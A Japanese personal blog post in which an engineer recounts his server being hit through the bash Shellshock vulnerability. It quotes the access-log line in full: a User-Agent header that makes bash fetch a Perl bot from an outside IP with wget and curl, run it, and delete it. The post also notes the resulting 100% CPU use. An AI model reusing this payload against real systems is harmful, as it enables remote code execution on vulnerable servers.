るいすときのこの物語

オタクエンジニアの雑記

bash脆弱「Shellshock」によって、CPU使用率が100%になるプログラムを実行される巻「LinuxNet perlbot」


世間で騒がれてる bash脆弱性「Shellshock」 詳しいことは分からないけどbashが基で動いてる Linux は多いから OpenSSL脆弱のときよりやばいらしい

Twitter とか見ていても案外周りの人も普通に突かれてて親切に User-Agent に脆弱あるよ!ここのサイト見た方がいい!っていうものだったり おれもきててもそんなもんだろうと思ってました。

違った

 

SnapCrab_NoName_2014-9-29_9-45-29_No-00

 

[source] "GET /cgi-bin/hi HTTP/1.0" 403 212 "-" "() {  :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm --rf /tmp/ji;rm -rf /tmp/ji*\x22" "-" [/source]

Shellshockを使って、wget でプログラムをダウンロードして、curl -O で/jurat を /tmp/ji に保存して、プログラムを実行して /tmp/ji* を削除

http://213.5.67.223/ji にアクセスしてみるとPerlで書かれたプログラム「LinuxNet perlbot」がありました。 調べてみるとPerlを使ってCPUを100%にさせて機能不能にさせるというものだった。 ということで、TOPコマンドしてみた。

 

SnapCrab_1912388216 - Poderosa_2014-9-29_10-7-42_No-00

やった!使用率100%になった! とりあえず bashのアップデートしようと思いますが怖いですね。

http://213.5.67.223/jurat ここは存在してなかったので curl -O は実行出来ませんでした。

参考:http://d.hatena.ne.jp/Kango/20140928/1411939683 参考:https://forum.linode.com/viewtopic.php?t=8169